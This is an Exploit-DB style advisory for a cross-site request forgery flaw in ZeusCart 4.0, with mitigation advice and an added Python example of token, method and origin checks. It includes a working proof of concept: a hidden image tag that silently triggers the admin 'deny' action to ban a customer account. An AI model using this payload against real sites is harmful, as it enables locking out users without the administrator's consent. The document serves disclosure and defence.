Vendor: ZeusCart
Author: mqt
CVSS: 6.8 (MEDIUM)
CWE: 352 (Cross Site Request Forgery)
Product Name: ZeusCart
Affected Version From: ZeusCart 4.0
Affected Version To: ZeusCart 4.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:zeuscart:zeuscart:4.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
Year: 2018

ZeusCart 4.0 Deactivate Customer Accounts CSRF

Because the form is not validated, ZeusCart 4.0 suffers from a Cross Site Request Forgery vulnerability: an attacker can perform actions on behalf of a victim by having the victim visit an attacker-controlled site. In this case, the attacker is able to 'deactivate' any customer account, which means that the account is banned and cannot log in.

Mitigation:

Validate all state-changing forms and requests (for example with a per-session anti-CSRF token) to prevent CSRF attacks.

Exploit-DB raw data:

# Exploit Title: ZeusCart 4.0 Deactivate Customer Accounts CSRF
# Date: 12/20/2018
# Exploit Author: mqt
# Vendor Homepage: http://www.zeuscart.com/
# Version: Zeus Cart 4.0 CSRF

1. Vulnerability Description

Due to the form not being validated, ZeusCart 4.0 suffers from a Cross
Site Request Forgery vulnerability, which means an attacker can
perform actions on behalf of a victim, by having the victim visit an
attacker controlled site.

In this case, the attacker is able to "deactivate" any customer
accounts, which means that the account is banned and cannot log in.

Proof of Concept:
<html>
	<body>
		<!-- hidden image whose request triggers the admin action; "msrc" in the original listing is a typo for "src" -->
		<img style="display:none" src="http://localhost/admin/?do=regstatus&action=deny&id=2" alt="">
	</body>
</html>
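The proof of concept works because the admin action is reachable by a plain GET with no proof that the request came from the admin's own page. The following is an added example, not ZeusCart code, of the server-side check the mitigation section calls for: the handler refuses the action unless it arrives as a POST, carries the per-session token embedded in the admin form, and comes from the site's own origin. The `Session`, `Request` and `handle_regstatus` names, the `http://localhost` origin and the `attacker.example` referer are constructed for the illustration.

```python
import hmac
import secrets
from dataclasses import dataclass, field


# Constructed stand-ins for a server-side session and an incoming HTTP request.
@dataclass
class Session:
    # One random token per session; the admin form embeds it as a hidden field.
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))


@dataclass
class Request:
    method: str
    path: str
    params: dict      # query-string or form fields
    headers: dict
    session: Session


def issue_form_token(session):
    """Token the server writes into the admin form (hidden input)."""
    return session.csrf_token


def is_same_origin(request, expected_origin="http://localhost"):
    """Accept only if Origin, or failing that Referer, matches our own origin."""
    origin = request.headers.get("Origin")
    if origin is None:
        referer = request.headers.get("Referer", "")
        return referer.startswith(expected_origin + "/")
    return origin == expected_origin


def authorize_state_change(request):
    """Return (ok, reason) for a state-changing action such as regstatus/deny."""
    if request.method != "POST":
        # An <img src=...> can only produce a GET, so this alone defeats the PoC.
        return False, "state-changing action must use POST"
    supplied = request.params.get("csrf_token", "")
    # Constant-time comparison; encode so non-ASCII input cannot raise.
    if not hmac.compare_digest(supplied.encode(), request.session.csrf_token.encode()):
        return False, "missing or invalid CSRF token"
    if not is_same_origin(request):
        return False, "cross-origin request"
    return True, "ok"


def handle_regstatus(request):
    """Hardened handler: validate first, act only afterwards."""
    ok, reason = authorize_state_change(request)
    if not ok:
        return 403, reason
    # In the real application this is where the account status would be changed.
    return 200, f"account {request.params['id']} set to {request.params['action']}"


def demo():
    """Replay the forged GET from the PoC and a legitimate admin POST."""
    session = Session()
    forged = Request("GET", "/admin/",
                     {"do": "regstatus", "action": "deny", "id": "2"},
                     {"Referer": "http://attacker.example/"}, session)
    legit = Request("POST", "/admin/",
                    {"do": "regstatus", "action": "deny", "id": "2",
                     "csrf_token": issue_form_token(session)},
                    {"Origin": "http://localhost"}, session)
    return handle_regstatus(forged), handle_regstatus(legit)


if __name__ == "__main__":
    for status, msg in demo():
        print(status, msg)
```

The order of checks matters: the method check runs before anything touches the database, and the token comparison uses `hmac.compare_digest` so a wrong token is rejected without leaking timing. Marking the session cookie `SameSite=Lax` or `Strict` adds a second, browser-enforced layer, but the server-side token remains the control the application itself can verify.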